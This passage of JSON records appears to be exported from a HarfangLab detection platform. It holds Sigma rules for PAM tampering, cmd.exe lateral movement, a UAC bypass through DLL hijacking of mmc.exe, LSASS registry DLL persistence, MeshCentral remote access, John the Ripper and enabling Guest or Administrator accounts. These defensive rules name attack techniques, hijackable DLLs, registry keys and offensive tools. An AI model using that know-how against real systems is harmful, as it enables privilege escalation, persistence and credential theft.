'/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - ProcessAncestors:\n - '*|/usr/bin/runc|/usr/bin/dockerd|/usr/lib/systemd/systemd'\n - '/usr/bin/bash|/snap/docker/*/bin/runc|/snap/docker/*/bin/dockerd|*'\n - '*|/usr/bin/containerd-shim-runc-v2|/usr/bin/containerd-shim-runc-v2|*'\n\n exclusion_docker2:\n ProcessImage: '*/bin/dockerd'\n ProcessCommandLine: 'docker-applyLayer *'\n\n exclusion_microdnf:\n ProcessImage: '/usr/bin/microdnf'\n\n exclusion_chmod:\n ProcessImage: '/bin/chmod'\n\n exclusion_vmware:\n ProcessCommandLine|contains:\n - 'vmware-config-tools'\n - 'vmware-uninstall-tools.pl'\n\n exclusion_authselect:\n ProcessImage: '/usr/bin/authselect'\n\n exclusion_apk:\n ProcessImage: '/sbin/apk'\n\n exclusion_podman:\n ProcessImage:\n - '/usr/bin/podman'\n - '/usr/bin/buildah'\n ProcessCommandLine: 'storage-*'\n\n exclusion_reconfigure:\n - ProcessCommandLine:\n - '/usr/bin/python3 /usr/bin/reconfigure'\n - '/usr/bin/python3 /usr/bin/reconfigure -a'\n - ProcessParentCommandLine:\n - '/usr/bin/python3 /usr/bin/reconfigure'\n - '/usr/bin/python3 /usr/bin/reconfigure -a'\n\n exclusion_qemu:\n ProcessImage: '/usr/bin/qemu-*-static'\n ProcessParentImage: '/usr/bin/qemu-*-static'\n\n exclusion_alternatives:\n ProcessImage:\n - '/usr/bin/update-alternatives'\n - '/usr/sbin/alternatives'\n ProcessCommandLine|startswith:\n - 'update-alternatives '\n - '/usr/sbin/alternatives '\n\n exclusion_deepinstinct:\n ProcessCommandLine: '/bin/bash /opt/deepinstinct/bin/StaticAnalysisService/start_sa_service.sh'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_realmd:\n - ProcessParentCommandLine: '/usr/lib64/realmd/realmd'\n - ProcessGrandparentCommandLine: '/usr/lib64/realmd/realmd'\n\n exclusion_buildah:\n ProcessAncestors|startswith: '|/usr/bin/buildah|'\n\n exclusion_sed1:\n ProcessImage: '/usr/bin/sed'\n Path: '/etc/pam.d/sed??????'\n exclusion_sed2:\n ProcessImage: '/usr/bin/sed'\n TargetPath: '/etc/pam.d/sed??????'\n\n exclusion_chown:\n ProcessCommandLine: 'chown -R '\n\n exclusion_rudder:\n ProcessImage: '/opt/rudder/bin/cf-agent'\n\n exclusion_puppet:\n ProcessImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_coreutils:\n ProcessImage: '/usr/bin/coreutils'\n\n exclusion_nxserver:\n ProcessParentCommandLine|startswith: '/bin/bash /usr/NX/scripts/setup/nxnode --install'\n\n exclusion_rsync:\n ProcessImage: '/usr/bin/rsync'\n\n exclusion_tar:\n ProcessImage: '/usr/bin/tar'\n\n exclusion_plesk:\n ProcessCommandLine|startswith: '/usr/libexec/platform-python -Estt /usr/local/psa/bin/dnf_install '\n\n exclusion_nixos:\n ProcessGrandparentImage: '/nix/store/*-switch-to-configuration-*/bin/switch-to-configuration'\n\n condition: selection and not is_read_access and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c0f2754a-239d-4e6e-acf2-04f65ab80452",
"rule_name": "PAM Modules Modified",
"rule_description": "Detects an attempt to modify a pluggable authentication module (PAM).\nPAM is a suite of libraries that allows a Linux system administrator to configure methods to authenticate users.\nAdversaries may modify pluggable authentication modules to access user credentials or to add a backdoor and achieve persistence.\nIt is recommended to investigate the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2023-01-06",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1556.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c110eda5-b1c7-4bb4-9a9d-8a48bcc98222",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073005Z",
"creation_date": "2026-03-23T11:45:34.073007Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073012Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1047/",
"https://attack.mitre.org/techniques/T1021/002/",
"https://attack.mitre.org/techniques/T1021/003/"
],
"name": "t1047_suspicious_lateral_movement.yml",
"content": "title: Suspicious Lateral Movement\nid: c110eda5-b1c7-4bb4-9a9d-8a48bcc98222\ndescription: |\n Detects a suspicious lateral movement where specifics cmd.exe arguments are used with mixed case.\n The cmd.exe options /q and /c are commonly used to execute commands but in many offensive tools the two arguments are used with mixed case in a specific order.\n For example this construction is used by tools such as Impacket, NetExec, CrackMapExec.\n It is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\nreferences:\n - https://attack.mitre.org/techniques/T1047/\n - https://attack.mitre.org/techniques/T1021/002/\n - https://attack.mitre.org/techniques/T1021/003/\ndate: 2023/12/20\nmodified: 2025/03/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1047\n - attack.lateral_movement\n - attack.t1021.002\n - attack.t1021.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage:\n - '*\\wmiprvse.exe'\n - '*\\mmc.exe'\n - '*\\explorer.exe'\n - '*\\services.exe'\n - '*\\svchost.exe'\n - '*\\taskeng.exe'\n - '*\\winrshost.exe'\n - '*\\wsmprovhost.exe'\n ProcessImage: '*\\cmd.exe'\n CommandLine|re: '.* [/-]Q [/-]c .*'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c110eda5-b1c7-4bb4-9a9d-8a48bcc98222",
"rule_name": "Suspicious Lateral Movement",
"rule_description": "Detects a suspicious lateral movement where specifics cmd.exe arguments are used with mixed case.\nThe cmd.exe options /q and /c are commonly used to execute commands but in many offensive tools the two arguments are used with mixed case in a specific order.\nFor example this construction is used by tools such as Impacket, NetExec, CrackMapExec.\nIt is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\n",
"rule_creation_date": "2023-12-20",
"rule_modified_date": "2025-03-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1021.003",
"attack.t1047"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c143a1ec-5597-4f0e-8998-2d80ce946637",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078704Z",
"creation_date": "2026-03-23T11:45:34.078706Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078711Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME"
],
"name": "t1548_002_uac_bypass_mmc.yml",
"content": "title: UAC Bypass Executed via mmc\nid: c143a1ec-5597-4f0e-8998-2d80ce946637\ndescription: |\n Detects an UAC bypass via mmc.exe.\n This alert triggers on mmc.exe loading a dll in system32 directory which is not signed by Microsoft.\n Known missing DLLs:\n - Windows 7 to Windows 10 RS1: elsext.dll\n - Windows 7 to Windows 10 RS3: WbemComn.dll\n - Windows 7 to latest: duser.dll and osksupport.dll\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the process that created the suspicious loaded DLL and the one that launched mmc.exe.\nreferences:\n - https://github.com/hfiref0x/UACME\ndate: 2020/10/16\nmodified: 2025/05/06\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.002\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\Windows\\System32\\mmc.exe'\n ImageLoaded:\n - '?:\\Windows\\System32\\elsext.dll'\n - '?:\\Windows\\System32\\WbemComn.dll'\n - '?:\\Windows\\System32\\duser.dll'\n - '?:\\Windows\\System32\\osksupport.dll'\n\n filter_signed:\n Signed: 'true'\n Signature|contains:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_known_good_elsext:\n ImageLoaded: '?:\\Windows\\System32\\elsext.dll'\n sha256: '37d2061ba13ff7153f66f0e4828ddf8ed73e87b07a7a67fb4875768da69fbe0e'\n\n exclusion_known_good_wbemcomn:\n ImageLoaded: '?:\\Windows\\System32\\WbemComn.dll'\n sha256:\n - '2ef449149dbf52b1700304f8a3bda9c1060356f44dda6f47369c29cfd2b51dfe'\n - 'a734a20357026c42950394682a52cbc3af956d09f1949e1b4e95467e999bc428'\n - '7108bbae5b91ed6784bd32547f7bd9dead392e47acab29dc057aef7cfb746f3c'\n\n exclusion_known_good_duser:\n ImageLoaded: '?:\\Windows\\System32\\duser.dll'\n sha256:\n - '56f781cdcd03f6fa21b38f133bd1db902d53d9cf2708d12760d353346221351b'\n - 'c7be8a83ef861073c9f9e510a579d42cfae6dd04a92bdd98273e0c8a99a413cc'\n - 'dd663029b2eb7b12fdb00fce403d8326141e540e3b9ce84cd5871473d3e2e2cf'\n - '5ebebe1220e070847677a3c3a91ea7a8cde663467335a9e7e801dffd97e14ec2'\n - '9168110ef404bf179888af4a0f02b2817f020bfb16351778f2ddd6915c92f190'\n - '12afc921ef64950e272cff3cd5ffe0d0667c4a1a47783b32a1cc15da91443fe3'\n - '2dba9f60dad43c8abda1bf82f828ca544183bc2f67c0bc70f8743e31bbdb390d'\n - 'bce6a4f5d0878a91a7e5fa0a962c0000efd5e9624c8cc3a4f3453413d3c7c842'\n\n exclusion_opera:\n ProcessImage|endswith: 'AppData\\Local\\Programs\\Opera\\opera.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c143a1ec-5597-4f0e-8998-2d80ce946637",
"rule_name": "UAC Bypass Executed via mmc",
"rule_description": "Detects an UAC bypass via mmc.exe.\nThis alert triggers on mmc.exe loading a dll in system32 directory which is not signed by Microsoft.\nKnown missing DLLs:\n - Windows 7 to Windows 10 RS1: elsext.dll\n - Windows 7 to Windows 10 RS3: WbemComn.dll\n - Windows 7 to latest: duser.dll and osksupport.dll\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the process that created the suspicious loaded DLL and the one that launched mmc.exe.\n",
"rule_creation_date": "2020-10-16",
"rule_modified_date": "2025-05-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c1464388-eec2-4bda-914f-afaab4ab765a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071856Z",
"creation_date": "2026-03-23T11:45:34.071858Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071862Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"http://redplait.blogspot.com/2015/02/lsasrvdlllsaploadlsadbextensiondll.html",
"https://blog.xpnsec.com/exploring-mimikatz-part-1/",
"https://twitter.com/SBousseaden/status/1183745981189427200"
],
"name": "t1112_persistence_registry_lsass_ntds.yml",
"content": "title: LSASS NTDS Undocumented DLL Load Persistence Added\nid: c1464388-eec2-4bda-914f-afaab4ab765a\ndescription: |\n Detects a modification of undocumented registry keys allowing to load arbitrary DLLs in LSASS.\n Attackers may use these DLLs to execute arbitrary code in LSASS to access credentials or for persistence purposes.\n It is recommended to analyze the specified DLL for malicious content and the process making the registry modification for any other suspicious actions.\nreferences:\n - http://redplait.blogspot.com/2015/02/lsasrvdlllsaploadlsadbextensiondll.html\n - https://blog.xpnsec.com/exploring-mimikatz-part-1/\n - https://twitter.com/SBousseaden/status/1183745981189427200\ndate: 2020/10/02\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set:\n EventType: 'SetValue'\n TargetObject:\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt*'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt*'\n\n selection_rename:\n EventType:\n - 'RenameValue'\n - 'RenameKey'\n NewName:\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt*'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt*'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_tiworker:\n Image|endswith: '\\Windows\\WinSxS\\\\*\\tiworker.exe'\n\n exclusion_lsadb:\n Image: '?:\\Windows\\System32\\lsass.exe'\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt'\n Details: '?systemroot?\\system32\\lsadb.dll'\n\n exclusion_ntdsa:\n Image: '?:\\Windows\\System32\\lsass.exe'\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt'\n Details: '?systemroot?\\system32\\ntdsa.dll'\n\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c1464388-eec2-4bda-914f-afaab4ab765a",
"rule_name": "LSASS NTDS Undocumented DLL Load Persistence Added",
"rule_description": "Detects a modification of undocumented registry keys allowing to load arbitrary DLLs in LSASS.\nAttackers may use these DLLs to execute arbitrary code in LSASS to access credentials or for persistence purposes.\nIt is recommended to analyze the specified DLL for malicious content and the process making the registry modification for any other suspicious actions.\n",
"rule_creation_date": "2020-10-02",
"rule_modified_date": "2025-02-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c170382c-1feb-48e7-8335-32fbf5b27583",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082867Z",
"creation_date": "2026-03-23T11:45:34.082881Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082886Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/malmoeb/status/1558861977379868672",
"https://meshcentral.com/info/",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_suspicious_meshcentral_agent_execution.yml",
"content": "title: Suspicious MeshCentral Agent Execution\nid: c170382c-1feb-48e7-8335-32fbf5b27583\ndescription: |\n Detects the suspicious execution of a MeshCentral agent being executed on the target host.\n MeshCentral is a remote host control tool that can be used maliciously as a Remote Access Tool (RAT).\n It is recommended to investigate how the Mesh Agent Service was installed.\nreferences:\n - https://twitter.com/malmoeb/status/1558861977379868672\n - https://meshcentral.com/info/\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2022/08/23\nmodified: 2025/07/25\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.MeshCentral\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - ProcessInternalName: 'MeshAgent'\n - ProcessDescription: 'Mesh Agent Service'\n - ProcessProduct: 'Mesh Agent Service'\n - ProcessSignatureSignerIssuerName|startswith: 'MeshCentralRoot-'\n - Image: '?:\\Program Files\\Mesh Agent\\MeshAgent.exe'\n\n exclusion_tacticalrmm:\n ParentImage:\n - '?:\\Program Files\\TacticalAgent\\tacticalrmm.exe'\n - '?:\\Program Files (x86)\\TacticalAgent\\tacticalrmm.exe'\n\n exclusion_benign:\n CommandLine:\n - '?:\\Program Files\\Mesh Agent\\MeshAgent.exe --installedByUser=S-1-5-21-*'\n - '?:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe --installedByUser=S-1-5-21-*'\n - '?:\\Program Files\\Mesh Agent\\MeshAgent.exe'\n - '?:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe'\n - '?:\\Program Files\\Mesh Agent\\MeshAgent.exe -nodeid'\n - '?:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe -nodeid'\n - '?:\\Program Files\\Mesh Agent\\MeshAgent.update.exe -b64exec *'\n - '?:\\Program Files\\Mesh Agent\\MeshAgent.exe -b64exec *'\n - '-kvm1'\n - '-kvm1 -coredump'\n - '--slave'\n - 'MeshAgent.exe -b64exec *'\n - '?:\\Program Files\\Mesh Agent\\meshagent.exe state'\n - '?:\\Program Files\\Mesh Agent\\MeshAgent.exe -funinstall --meshServiceName=Mesh Agent'\n - '?:\\Program Files\\Mesh Agent\\MeshAgent.exe --WebProxy=*'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c170382c-1feb-48e7-8335-32fbf5b27583",
"rule_name": "Suspicious MeshCentral Agent Execution",
"rule_description": "Detects the suspicious execution of a MeshCentral agent being executed on the target host.\nMeshCentral is a remote host control tool that can be used maliciously as a Remote Access Tool (RAT).\nIt is recommended to investigate how the Mesh Agent Service was installed.\n",
"rule_creation_date": "2022-08-23",
"rule_modified_date": "2025-07-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c187a1fd-f61c-421b-b453-2560ba9583c1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613422Z",
"creation_date": "2026-03-23T11:45:34.613426Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613433Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/openwall/john",
"https://attack.mitre.org/techniques/T1110/001/",
"https://attack.mitre.org/techniques/T1110/002/",
"https://attack.mitre.org/techniques/T1110/003/",
"https://attack.mitre.org/techniques/T1110/004/",
"https://attack.mitre.org/techniques/T1003/008/",
"https://attack.mitre.org/techniques/T1078/"
],
"name": "t1110_002_john.yml",
"content": "title: John the Ripper Execution\nid: c187a1fd-f61c-421b-b453-2560ba9583c1\ndescription: |\n Detects the execution of John the Ripper, an Open Source password cracker.\n John the Ripper is a password-cracking tool that helps attackers identify weak or compromised passwords by performing brute-force and dictionary attacks.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://github.com/openwall/john\n - https://attack.mitre.org/techniques/T1110/001/\n - https://attack.mitre.org/techniques/T1110/002/\n - https://attack.mitre.org/techniques/T1110/003/\n - https://attack.mitre.org/techniques/T1110/004/\n - https://attack.mitre.org/techniques/T1003/008/\n - https://attack.mitre.org/techniques/T1078/\ndate: 2021/09/14\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1110.001\n - attack.t1110.002\n - attack.t1110.003\n - attack.t1110.004\n - attack.t1003.008\n - attack.t1078\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.HackTool.John\n - classification.Linux.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/john'\n - '/unshadow'\n condition: selection\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c187a1fd-f61c-421b-b453-2560ba9583c1",
"rule_name": "John the Ripper Execution",
"rule_description": "Detects the execution of John the Ripper, an Open Source password cracker.\nJohn the Ripper is a password-cracking tool that helps attackers identify weak or compromised passwords by performing brute-force and dictionary attacks.\nIt is recommended to verify if the usage of this tool is legitimate.\n",
"rule_creation_date": "2021-09-14",
"rule_modified_date": "2025-01-15",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.008",
"attack.t1078",
"attack.t1110.001",
"attack.t1110.002",
"attack.t1110.003",
"attack.t1110.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c1bddf11-5142-49af-a953-f8c3d1adc1a0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621955Z",
"creation_date": "2026-03-23T11:45:34.621963Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621967Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1078/001/",
"https://attack.mitre.org/techniques/T1098/"
],
"name": "t1564_net_enable_account.yml",
"content": "title: Sensitive User Account Enabled via net.exe\nid: c1bddf11-5142-49af-a953-f8c3d1adc1a0\ndescription: |\n Detects a sensitive account being activated via net1.exe.\n Adversaries may reactivate sensitive accounts such as Guest or local administrator and use them for persistence purposes.\n It is recommended to investigate the process performing this action to determine its legitimacy and any suspicious authentications using the enabled account.\nreferences:\n - https://attack.mitre.org/techniques/T1078/001/\n - https://attack.mitre.org/techniques/T1098/\ndate: 2021/12/27\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1078.001\n - attack.t1098\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n\n selection_account:\n CommandLine|contains: '/active:y'\n\n selection_enable:\n CommandLine|contains:\n - 'administrator'\n - 'administrateur'\n - 'guest'\n - 'invité'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_diane:\n - ProcessGrandparentImage|endswith:\n - '\\DianeUpdate.exe'\n - '\\DiaUpdate.exe'\n ProcessGrandparentSignature: 'BOW MEDICAL SAS'\n - ProcessGrandparentImage|endswith:\n - '\\DiaUpdate.exe'\n - '\\DianeUpdate.exe'\n ProcessGrandparentDescription: 'Application Diane'\n - ProcessGrandparentImage|endswith:\n - '\\DiaUpdate.exe'\n - '\\DianeUpdate.exe'\n ProcessGrandparentCompany: 'BOW MEDICAL'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe'\n - '?:\\Program Files\\Microsoft Intune Management Extension\\AgentExecutor.exe'\n - '?:\\Windows\\System32\\oobe\\Setup.exe|?:\\Windows\\System32\\oobe\\windeploy.exe'\n - '?:\\Program Files (x86)\\CentraStage\\CagService.exe|?:\\Windows\\System32\\services.exe'\n - '?:\\Windows\\AdminArsenal\\PDQDeployRunner\\service-?\\PDQDeployRunner-?.exe'\n - '?:\\Program Files (x86)\\\\*\\winpty-agent.exe'\n - '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - '?:\\MININT\\Tools\\X64\\TsManager.exe'\n - '?:\\Program Files\\Altiris\\Dagent\\dagent.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c1bddf11-5142-49af-a953-f8c3d1adc1a0",
"rule_name": "Sensitive User Account Enabled via net.exe",
"rule_description": "Detects a sensitive account being activated via net1.exe.\nAdversaries may reactivate sensitive accounts such as Guest or local administrator and use them for persistence purposes.\nIt is recommended to investigate the process performing this action to determine its legitimacy and any suspicious authentications using the enabled account.\n",
"rule_creation_date": "2021-12-27",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1078.001",
"attack.t1098"
],
"warnings": null,
"errors": null,
"declared_in": null,
